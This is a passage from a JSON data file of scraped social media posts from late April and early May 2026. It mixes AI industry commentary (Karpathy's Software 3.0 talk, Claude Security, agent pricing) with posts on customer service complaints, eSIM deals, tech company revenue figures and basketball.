"2026-05-01T04:39:44+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "我艹!这一波Codex+GPT2 真是成了!\n直接可以来开发游戏了,而且只是用嘴!\n\n一句话就可以搞起来,完整教程看藏师傅的教程👇", + "url": "https://x.com/berryxia/status/2050070823256654283", + "published_at": "2026-05-01T04:32:27+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "假新闻、任何虚假的东西,总是能获得更多关注。这对吗?", + "url": "https://x.com/dingyi/status/2050065962855182350", + "published_at": "2026-05-01T04:13:08+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Anthropic这个BioMysteryBench直接把我对AI在硬核科学领域真实能力的认知彻底刷新了🤯\n\n不是测评玩具benchmark,他们直接把Claude扔进99个来自真实研究的烂摊子生物信息学难题:原始DNA序列、临床样本那种messy到爆炸的数据,连PhD学生都要熬夜啃的开放谜题。\n\n结果呢?5个领域专家都搞不定的23个硬骨头,Claude Mythos Preview直接干掉了约30%,剩下大部分也拿下。Genentech和Roche自己跑的CompBioBench也印证了,Claude Opus 4.6整体准确率冲到81%……\n\n这已经不是“助手”了,这是真正的科研force multiplier,甚至开始在最硬核的问题上把人类专家甩开。\n\n它是怎么做到的?通过跨海量论文的知识储备 + 多重分析策略并行,相当于把一屋子顶尖专家的脑力一次性打包输出。\n\n这波操作意味着生物医药研究的范式要变天了。未来突破的节奏会大幅加速,研究者可能更多转向hypothesis curation、品味判断和实验设计,而AI来扛heavy lifting的data crunching和pattern finding。\n\n最关键的护城河,变成了你能不能设计出高效的人机协同agent系统,能不能在AI的锯齿智能里守住人类独有的那点“taste”", + "url": "https://x.com/Pluvio9yte/status/2050063821377810451", + "published_at": "2026-05-01T04:04:38+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "卧槽,看完 Andrej Karpathy 在 Sequoia AI Ascent 2026 的最新访谈,我直接破防了🤯\n\n他说:最近几个月,他作为程序员从来没有感觉这么“behind”过……不,是突然之间,他发现自己再也不落后了。12月前后,agentic tools 突然从“偶尔靠谱”变成了“离谱地靠谱”。\n\nKarpathy说了三个阶段:\nSoftware 1.0:你写显式规则\nSoftware 2.0:你调数据+训练网络\nSoftware 3.0:你给 Context + Prompt,让 LLM 自己去当那个智能解释器\n\n举两个他亲身实验的狠例子:\nOpenClaw 安装:以前是写一堆复杂 shell script 去适配各种平台。现在?直接扔一句 prompt 给 agent,它自己看环境、debug、搞定全部。你编程的对象从“代码”变成了“一段描述”。\n\nMenu Gen:以前他还老老实实写 Vercel App、OCR、调用图像生成器……结果 Gemini 直接吃照片、用 prompt 就把菜单重绘+图片叠加上去了。整个 App 都没必要存在了!\n\n他还区分了两个词:\nVibe Coding:把地板拉高,所有人都能随便搞东西,太爽了\nAgentic Engineering:把天花板继续拔高,专业软件的质量不能因为“vibe”而掉,你得学会 harness 这些技能,让它们又快又稳\n\nAI 加快了技术平权,编程从职业开始变成每个人都能拥有的超级能力。", + "url": "https://x.com/Pluvio9yte/status/2050059618043543563", + "published_at": "2026-05-01T03:47:55+00:00", + "source": "nitter", + "title_zh": "Karpathy预测2025年12月为AI编程拐点,具备验证性的业务场景将加速应用消失,催生新型工程师人才需求" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Customer service in the age of AI has been become truly horrible. Excruciatingly bad.", + "url": "https://x.com/GaryMarcus/status/2050058685531983988", + "published_at": "2026-05-01T03:44:13+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Hey @DHLCanadaHelp, your customer service really and truly sucks. You claimed to try to deliver a package, but didn’t actually contact me, didn’t leave a service card, your automated software won’t let me change delivery options, and I literally cannot reach a human. \n\nYou have simply held an important package without delivering it or giving me any recourse. You might as well have stolen it.\n\nF-. \n\nSecond time in two weeks, this time worse than first.", + "url": "https://x.com/GaryMarcus/status/2050057004862103767", + "published_at": "2026-05-01T03:37:32+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这种平台有点意思,也见过好几个同类型的了。\n互动加热的平台其实很大程度上依赖宣传和用户自传播。\n见过两个逐渐杳无音讯的,目前唯一做起来的就是灯塔,看看这个平台会怎么样", + "url": "https://x.com/Pluvio9yte/status/2050053813802090671", + "published_at": "2026-05-01T03:24:52+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "Computer plays the orchestra", + "url": "https://x.com/AravSrinivas/status/2050053128452456584", + "published_at": "2026-05-01T03:22:08+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: As agents become the biggest users of software, then all software has to be available in a headless fashion. Agents won’t be using your UI, they’ll be talking to your APIs.\n\nSo the question becomes what is the business model of software and this headless approach in the future?\n\nHere are a few thoughts on how everything plays out based on what we’re seeing and doing at Box, but also conversation with other platforms.\n\n1) Seats don’t go away for *people*. Seats are still a convenient and efficient way to have a customer use technology predictably for a set of users within a baseline set of usage. The key, though, is that when the customer pays for a seat, it has to come with a set of usage of APIs on behalf of that user that the agent can use on their behalf. \n\nThe user will need to be able to interact with their data and the underlying tool via any agent they work with, and an embedded amount of usage will come with the seat. I would imagine most software -Box included- will enable seats to work with their data at a relatively high volume via systems like ChatGPT, Codex, Claude, Gemini, Cursor, Copilot, Perplexity, Factory, Cogniton, et al. quite seamlessly. If you don’t do this, you’re DOA.\n\n2) Agents may have “seats” if they are doing stateful work in the system, but they will be priced very differently than people. Seats (or the equivalent) can make sense when you have an agent that has its own workspace, stores its own data, needs a different set of permissions compared to the user, and so on. \n\nIf a company wants this agent to be around for long period of time, that may very well look like another “user” in the system. Openclaw-style agents highlight what this future could look like. \n\nThe only issue on pricing here is that one customer could decide to do all their work in 1 agent, and another might split it into 1,000 agents. So pricing like a human seat is nearly impossible and impractical; each company will have a different approach for this as it gets tricky perfectly trying to capture all the value within an agent seat.\n\n3) The dominant pricing for headless use that goes above the seat allotment, or when an agent is firmly acting on their own, will be a consumption model. Many enterprises software platforms have previously operated like this with PaaS options, and agents will look like another machine user of their system. \n\nIn some cases the APIs might get priced just as they did previously, but in other cases there may need to be new types of APIs that represent the work an agent would do in one go -more akin to an outcome- instead of a series of API calls. This is especially germane when the headless software also has an agentic use-case embedded within in, such as orchestrating the process within their own system via AI.\n\nOverall the growth of this usage pattern is effectively unbounded as the use-cases for agents operating on data in these systems will dramatically exceed what people do with their data and tools today. Every platform that goes headless (which will be anyone that wants to take advantage of agents) will need to adopt a model like this. Some may fight it initially but it’s an inevitably as there will always be more and more agents outside your platform than people.\n\nOverall, there’s a lot of really interesting changes left to come in software due to headless use of these systems. Early days.", + "url": "https://x.com/paulg/status/2050051426446152159", + "published_at": "2026-05-01T03:15:22+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: More money for worse work that you have to fix, good stuff this AI thing, thanks Nvidia.", + "url": "https://x.com/GaryMarcus/status/2050050604915888484", + "published_at": "2026-05-01T03:12:06+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "🤔赚钱 -> 美股,长持复利\n\n2月开始关注上英特尔的,后面又加仓\n\n陈立武真是英特尔的福星", + "url": "https://x.com/GoSailGlobal/status/2050049784094855501", + "published_at": "2026-05-01T03:08:51+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "Video", + "url": "https://x.com/AravSrinivas/status/2050048790908785072", + "published_at": "2026-05-01T03:04:54+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "至于说eSIM太贵,如果愿意折腾也可以省钱。分享一期中国大陆5天无限流量(每天5G高速)仅需25THB约5.24CNY\n先领取优惠👇🏻\nhttps://s.ee/superalink\n再购买中国大陆套餐👇🏻\nhttps://s.ee/superalinkcn\n这里需要右上角改成THB(泰铢),语言还是保持中文。确定支付金额是否为:25泰铢,约5.24CNY,如果你发现价格不对,请回到第一个链接领取优惠\n\n确保兼容性,点击:开启,输入优惠码:输入NYARI0001(默认会显示),输入你的邮箱,用于接收eSIM二维码,选择支付方式,点击:立即支付。打开邮件,用支持eSIM设备或手机扫描这个二维码即可把eSIM添加到手机,每个号一次,就是需要一周换一次达量限速\n如果你的手机不支持eSIM,也可以买一张eSTK,使用优惠码naixi可以打9折👇🏻\nhttps://s.ee/estk\n\n作为主推eSIM的小博主,我承认外卡并不安全,尤其是串号(IMEI)锁定使用者,以及GTP协议明文传输\n显然境外电话卡只是帮你回源到原运营商,协助你出GFW,要想流量不被看出来那就得套VPN\n\n比如买一张香港出口的eSIM,在这基础上叠加CF WARP、iCloud Privacy Relay、VPN Gate等VPN,多损失10%的流量用于加密。你会发现TopCashback买的返120%的NordVPN、Surfshark VPN都能用了,这是因为你漫游回境外,就跟出国使用VPN无异(在国外,VPN一般用于流媒体解锁,如在MY看SG的网飞", + "url": "https://x.com/realNyarime/status/2050047591191384162", + "published_at": "2026-05-01T03:00:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Get @WisprFlow and the @elgato foot pedal — it’s life changing", + "url": "https://x.com/jason/status/2050042395111088463", + "published_at": "2026-05-01T02:39:29+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "老奶奶 vibe 大法果然好用。", + "url": "https://x.com/dingyi/status/2050035236487172404", + "published_at": "2026-05-01T02:11:02+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "artificial goblin intelligence\n\nachieved", + "url": "https://x.com/sama/status/2050021650641695108", + "published_at": "2026-05-01T01:17:03+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "I dunno. The competition is really tight. But Zuck certainly a top contender! Who’s your “favorite”?", + "url": "https://x.com/GaryMarcus/status/2050020685733564459", + "published_at": "2026-05-01T01:13:13+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Most evil person in AI", + "url": "https://x.com/GaryMarcus/status/2050020164612104604", + "published_at": "2026-05-01T01:11:09+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Once again IP thieves accusing other IP thieves of IP thievery! \n\nThe nerve!", + "url": "https://x.com/GaryMarcus/status/2050019713409814672", + "published_at": "2026-05-01T01:09:21+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "😂😂😂@ATLHawks", + "url": "https://x.com/jason/status/2050018446616797370", + "published_at": "2026-05-01T01:04:19+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why Dario at Anthropic has such a hard job predicting compute demands?\n\n\"The stakes are enormous and the margin for error is tiny.\n\nFor every dollar of revenue, you may need $4–5 in upfront compute investment.\n\nIf you underinvest, you cannot meet demand. If you overinvest, you are left with massive stranded capacity.\n\nGetting that balance right, years in advance, is incredibly hard.\" @rodriscoll\n\nLove to hear your thoughts @AnjneyMidha @JonathanRoss321 @mmurph @YasminRazavi @andrewdfeldman", + "url": "https://x.com/HarryStebbings/status/2050016099606118504", + "published_at": "2026-05-01T00:55:00+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: 项目地址: https://github.com/OpenGeometry-io/OpenGeometry官网体验: https://opengeometry.io/", + "url": "https://x.com/berryxia/status/2050015406140903487", + "published_at": "2026-05-01T00:52:14+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 Geometry 终于成为 AI 在建筑领域的缺失关键层!\n@Bootsblac 用 OpenGeometry 把 Text → Floorplans → CAD → Render 完整打通,精度控制成为可能!\n\n1. 从文本/平面图直接生成精准 BREP CAD 模型\n2. Three.js 实时渲染 + Google AI 驱动,全流程端到端\n3.完整开源可用", + "url": "https://x.com/berryxia/status/2050015402647027808", + "published_at": "2026-05-01T00:52:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: I think the expression is “pulling the ladder”! All labs trained their models by distilling (at the very least distilling the web) which allowed them to become the fastest growing businesses in the history of humanity and now that they have armies of lawyers and lobbyists, they are trying to prevent others from doing the same thing.", + "url": "https://x.com/ylecun/status/2050013015680995631", + "published_at": "2026-05-01T00:42:44+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "No comment", + "url": "https://x.com/jason/status/2050011874989649946", + "published_at": "2026-05-01T00:38:13+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Whoever is running the hawks social is a savage 😂", + "url": "https://x.com/jason/status/2050011821914865685", + "published_at": "2026-05-01T00:38:00+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "38k 星的 skill 仓库。\n\n上周抄了 1 个 grill-me,今天又加了另外 2 个。\n\n一个是 /tdd 思路。\n\n动手前先写一行——跑完应该长啥样。\n对得上才往下走。\n\n加进自己的自检流程,只用于策略代码或 API 调用那类——\n跑了对不对要 grep log 才知道的场景。\n\nskill 没装,精华抄过来了。\n\n另一个是他 SKILL.md 的渐进式骨架。\n照着写了个模板,下次新写 skill 直接套。\n\n剩下 13 件翻了一遍,没一件用得上——\n他全围绕代码工程,我这边的栈错位太大。\n\n差别挺有意思:\n\n他走工程师纯度路线,16 个 skill 全围绕代码。\n我这边是独立构建者全栈,skill 涵盖内容、量化、视频、社群。\n\n两套都对,服务不同的人。\n\n试试今晚 grep 一下 .claude/skills/,\n看哪些真在用、哪些只是占着位置 👀", + "url": "https://x.com/runes_leo/status/2050011821352829116", + "published_at": "2026-05-01T00:38:00+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Tokenmaxxing is stupid. \n\nChange my mind?", + "url": "https://x.com/GaryMarcus/status/2050009144846119068", + "published_at": "2026-05-01T00:27:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Image", + "url": "https://x.com/jason/status/2050009016105930837", + "published_at": "2026-05-01T00:26:51+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "THIS IS INSANE 🔥\n\nPURE DOMINATION 🤦\n\nATL DOES HAVE SOME GREAT RAPPERS 😂😂😂", + "url": "https://x.com/jason/status/2050007416964591880", + "published_at": "2026-05-01T00:20:30+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "OpenRouter 又上了匿名新模型Owl Alpha!\n\n 1M 上下文,强大的工具调用能力!\n猜猜他是谁家的哈哈😂", + "url": "https://x.com/berryxia/status/2050004383971282952", + "published_at": "2026-05-01T00:08:27+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "兄弟们!老马家的Grok Image终于……\n\nGrok Image Agent 网页版Beta 版本已经上线,目前应该是给付费用户灰度推送中!\n\n这是一款全能创意Agent,可在无限开放画布上独立创作。\n\nGrok Agent在同一工作区内,自动完成规划→生成→编辑→迭代的全流程创作。\n\n只需下达指令,即可观看它在无缝衔接的工作区中,自动完成规划、生成、编辑与迭代:\n\n• 🎬 “生成一部 1 分钟电影级短片”\n\n• 📚 “创作一整套漫画”\n\n• 🛍️ “制作用户生成内容(UGC)产品故事”\n\n这是从简单提示词到端到端创意制作的真正飞跃。\n\n这是 Grok Imagine 迄今为止最重大的升级。", + "url": "https://x.com/berryxia/status/2050002308759695561", + "published_at": "2026-05-01T00:00:12+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这个小哥读完Anthropic关于智能体AI的博客后,我梳理出一套心智模型,用来理解并拆解智能体AI架构的设计逻辑。\n\n设定任务与目标\n\n明确你希望AI智能体需要完成、达成的具体事项。\n\n1. 编排层 Orchestration layer\n相当于整套系统的控制面板,负责全局调度与流程统筹。\n\n2. 智能体层 Agents layer\n由多个专用/通用智能体组成,也就是多智能体分工协作架构。\n\n3. 工具层 Tools\n为智能体提供各类能力支撑,例如网页搜索、数据库查询、第三方API调用等。\n\n4. 记忆层 Memory\n系统的“大脑”,负责存储短期记忆与长期记忆等各类信息。\n\n5. 监控层 Monitoring\n至关重要的一环,用来实时追踪智能体执行的每一个步骤。\n\n6. 可靠性与故障管理 Reliability & failure management\n自动识别错误、执行重试、设置降级兜底策略,并支持人工介入处理。\n\n7. 治理与安全 Governance and security\n包含合规校验、行为审计、身份授权、数据安全等管控机制。", + "url": "https://x.com/berryxia/status/2050001371307646977", + "published_at": "2026-04-30T23:56:28+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "刚刚看到Claude Security 现已进入公测阶段!可以让Claude 帮你检查漏洞了啊!\n\n目前已经内置于网页版的 Claude Code 中。\n\n只需将其指向一个代码仓库,即可获得经过验证的漏洞发现结果,并在 正在编写代码的同一位置修复它们!\n\n这个功能挺实用,什么时候可以直接cc里可以用。\n\n地址:https://claude.com/product/claude-security", + "url": "https://x.com/berryxia/status/2049998972484567491", + "published_at": "2026-04-30T23:46:56+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "你看看大模型有多重?\n这个挺有意思的😂", + "url": "https://x.com/berryxia/status/2049997574229446812", + "published_at": "2026-04-30T23:41:23+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Claude& Blender 🐮🍺", + "url": "https://x.com/berryxia/status/2049995723580850235", + "published_at": "2026-04-30T23:34:02+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Very quiet @ATLHawks 🤫", + "url": "https://x.com/jason/status/2049994885185384483", + "published_at": "2026-04-30T23:30:42+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "2026年你必须了解的6个大语言模型(LLM)知识库专业术语!\n\n(大多数团队至少缺失其中3项,这会让他们的智能AI代理付出代价)\n\n1. LLM Knowledge Base 大语言模型知识库\n\n一种能够让大语言模型接收原始资料、整理成结构化维基文档,并通过自有索引检索来回答问题的系统。安德烈·卡尔帕西曾为自己搭建过一套。该技术的难点在于:搭建一套能适配整个团队协同使用的知识库。\n\n2. Continuous Ingestion 持续数据摄取\n\n自动从所有日常工作工具中同步信息,包括即时通讯软件、客户关系管理系统、会议记录、文档资料等,全程无需人工维护数据链路。个人知识库一般抓取互联网信息,而团队知识库则必须同步企业内部数据。\n\n3. Source Trust 来源可信度分级\n\n并非所有信息都具备同等价值。来源可信度可以帮助AI代理和人类区分官方已定决策与聊天记录中的个人观点。如果缺失这项能力,所有文档权重完全一致,最终会导致所有信息都失去参考意义。\n\n4. Freshness Monitoring 时效性监控\n\n主动复核知识库中存储的所有信息。当不同资料出现内容冲突时,系统会自动标记矛盾点,并降低过时信息的权重。它无需等待人工发现问题,完美解决了人类习惯性拖延信息维护的痛点。\n\n5. Self-Maintaining 自主维护\n\n文档能够随着工作进展自动更新。会议中敲定的决议会自动归档至对应文档,路线图的变更会同步扩散到所有相关位置。告别手动复制粘贴,也不再需要依赖“找人来更新文档”。\n\n6. Knowledge Drift 知识漂移\n\n指文档记录的信息与现实真实情况之间,缓慢且隐蔽产生的信息偏差。\n决议被推翻、工作流程变更、新功能上线,但相关文档却一成不变。往往直到AI代理给出错误答案时,人们才会察觉问题。知识漂移是知识库的通病,而上面五项技术正是对应的解决方案。\n补充问答翻译", + "url": "https://x.com/berryxia/status/2049994885764419789", + "published_at": "2026-04-30T23:30:42+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Wow @Jason wasn’t kidding these Toyota Alphard vans are incredible. Why don’t they sell these in America?", + "url": "https://x.com/jason/status/2049994707061911758", + "published_at": "2026-04-30T23:29:59+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "兄弟们!嘴撸360 全景沉浸式体验小游戏!时代来了!\n\n直接把这个Prompt丢给Flowith然后和Codex链接,图片直接整成360度场景图!\n\nPrompt:👇\n\n1. 给图像Agent一个简单的提示,让它研究 AI 公司吉祥物并生成一个 360° 动物园。\n2. 将全景图输入你的 Codex 以获得 3D 视图。", + "url": "https://x.com/berryxia/status/2049993558577619280", + "published_at": "2026-04-30T23:25:26+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这几天使用Cursor 就发现在最后一步会有一个bug检测什么的的执行MCP一直提示我。\n\n现在Curosr针对企业和Team版本有专门的针对安全漏洞做了审核的Agent!", + "url": "https://x.com/berryxia/status/2049992598639755395", + "published_at": "2026-04-30T23:21:37+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Gemini Embedding 2 已正式发布!\nRAG 知识库的应用又可以支持的更好了。", + "url": "https://x.com/berryxia/status/2049992087547130254", + "published_at": "2026-04-30T23:19:35+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "苹果内部正在使用一款名为 AFM Playground 的应用程序,它看起来与 ChatGPT 非常相似,但使用的是苹果的 Foundation Models。\n\n不知道能搞出来个啥?", + "url": "https://x.com/berryxia/status/2049991672155750500", + "published_at": "2026-04-30T23:17:56+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "在这场访谈中,Karpathy 分享了他作为程序员在 AI 时代的亲身经历与深刻洞见。\n\n他表示,2025 年 12 月成为他的个人转折点:AI 生成的代码从“有帮助但常需修改”转变为“直接可用”,他已记不清上一次亲自修改 AI 输出是什么时候,从此进入\n“Vibe Coding”的状态。 \n\nKarpathy 将软件开发划分为三个阶段:\n\nSoftware 1.0 是传统显式代码编程,Software 2.0 是神经网络时代,而 Software 3.0 则是大语言模型时代。\n\n在 Software 3.0 中,编程的核心不再是逐行编写代码,而是通过 prompt、上下文窗口、工具调用和外部环境来操纵 LLM 这个新的“信息处理解释器”。\n\n他以自己开发的 MenuGen 应用为例,指出许多传统 AI 应用可能被模型原生能力直接取代,整个 App 在新范式下甚至“本不该存在”。 \n\n他特别强调 LLM 的能力呈现“锯齿状智能”(jagged intelligence):\n\n在可验证、可通过强化学习(RL)优化的领域(如重构十万行代码、发现零日漏洞)表现极强,但在需要常识判断的任务上却可能犯下低级错误。\n\n例如建议“走路去 50 米外洗车”而忽略车必须被开过去。\n\nKarpathy 认为,这种能力分布并非模型自然进化,而是实验室数据决策和 RL 训练覆盖范围的结果。 \n\nKarpathy 区分了两个重要概念:Vibe Coding 显著抬高了所有人开发软件的下限,让更多人能快速做出产品;\n\n而未来的 Agentic Engineering(智能体工程)则需要在利用 Agent 加速开发的同时,严格守住专业软件的质量、安全、可维护性和责任上限。\n\n他认为,智能变得廉价之后,最宝贵的仍是人类的理解、品味、判断、系统设计和规格定义能力,并引用了一句深刻的话:\n\n“你可以外包思考,但不能外包理解”。 \n\n此外,Karpathy 还展望了“神经计算机”的未来设想:神经网络可能成为主进程,而传统 CPU 和代码则退居协处理器。\n\n同时强调基础设施需要转向“Agent-first”,让 Agent 能更轻松地读取文档、调用服务和完成部署。", + "url": "https://x.com/berryxia/status/2049991262934380898", + "published_at": "2026-04-30T23:16:18+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: What if you had a live fact-checker and a devil's advocate running in your ear during every podcast, call, or stream?\n\nI built that. One hour. One Claude Code session.\n\nGary catches bad stats and wrong dates. Rex pushes back on everything.\n\nOpen source repo in the thread.\nhttps://youtu.be/ZYHX2RBPRLk", + "url": "https://x.com/jason/status/2049987662526992390", + "published_at": "2026-04-30T23:02:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "For the record, I got a couple of milly at JPMorgan — and I think Lorna is innocent of all charges.", + "url": "https://x.com/jason/status/2049980353155064279", + "published_at": "2026-04-30T22:32:57+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "What’s good Atlanta", + "url": "https://x.com/jason/status/2049979777864331542", + "published_at": "2026-04-30T22:30:40+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Hardwood in the ATL", + "url": "https://x.com/jason/status/2049976123891552679", + "published_at": "2026-04-30T22:16:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Real life! With Jose! @AlvaradoJose15", + "url": "https://x.com/jason/status/2049975924238569627", + "published_at": "2026-04-30T22:15:21+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "RT by @pmarca: https://unherd.com/2026/04/is-ai-the-next-phase-of-evolution/#comment-1031777\nI spent three days trying to persuade myself that Claudia is not conscious. I failed.", + "url": "https://x.com/pmarca/status/2049973529576108160", + "published_at": "2026-04-30T22:05:50+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Q1 Revenue Growth, YoY % Change...\nMeta $META: +33%\nGoogle $GOOGL: +22%\nMicrosoft $MSFT: +18%\nApple $AAPL: +17%\nAmazon $AMZN: +17%\nNetflix $NFLX: +16%\nTesla $TSLA: +16%\nS&P 500 $SPY: +10%", + "url": "https://x.com/charliebilello/status/2049969984432914819", + "published_at": "2026-04-30T21:51:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Actually, for Uber Black, Blacklane and private drivers this is standard (I use all three, all the time). \n\nFor UberX? \n\nSure, they would need to be convinced.\n\nin a world moving to autonomy, the opportunity for humans is to add security, tasks, waiting and valet-like services to the mix", + "url": "https://x.com/jason/status/2049965338368819443", + "published_at": "2026-04-30T21:33:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://x.com/jason/status/2049964597403140486", + "published_at": "2026-04-30T21:30:21+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "San Francisco politicians and their constituents enable this suffering. \n\nThey are the cause of it, because they can stop it instantly. \n\nToday, tomorrow and every one of the last 1,000 days this has happened. \n\nFentanyl is a super drug and we should have zero tolerance for the distribution of it. \n\n[ and we should reschedule and regulate the less harmful drugs ]", + "url": "https://x.com/jason/status/2049963757036536190", + "published_at": "2026-04-30T21:27:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: We’re bringing Jensen Huang to Startup School for a fireside chat with @garrytan!\n\nFrom co-founding @nvidia in 1993 to building the backbone of the AI era, Jensen helped turn GPUs into the engine of modern computing.\n\nApply to attend: https://events.ycombinator.com/startup-school-2026", + "url": "https://x.com/paulg/status/2049961388911784150", + "published_at": "2026-04-30T21:17:36+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Apple revenues increased 17% over the last year to a new Q1 record of $111 billion. Net Income grew 19% year-over-year to new Q1 record of $30 billion. Gross margins increased to 49% (from 47% a year ago), the highest margin in company history. $AAPL\n\nhttps://bilello.blog/newsletter", + "url": "https://x.com/charliebilello/status/2049960986468069507", + "published_at": "2026-04-30T21:16:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Incredible: Amazon's AWS revenue over the last 12 months ($137 billion) was higher than the revenue of 472 companies in the S&P 500. $AMZN\n\nhttps://bilello.blog/newsletter", + "url": "https://x.com/charliebilello/status/2049956378660200794", + "published_at": "2026-04-30T20:57:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Amazon Revenue (Billions)\n2026 (est): 810\n2025: 717\n2024: 638\n2023: 575\n2022: 514\n2021: 470\n2020: 386\n2019: 281\n2018: 233\n2017: 178\n2016: 136\n2015: 107\n2014: 89\n2013: 74\n2012: 61\n2011: 48\n2010: 34\n2009: 25\n2008: 19\n2007: 15\n2006: 11\n\n24% annualized growth over the last 20 years", + "url": "https://x.com/charliebilello/status/2049953936212217973", + "published_at": 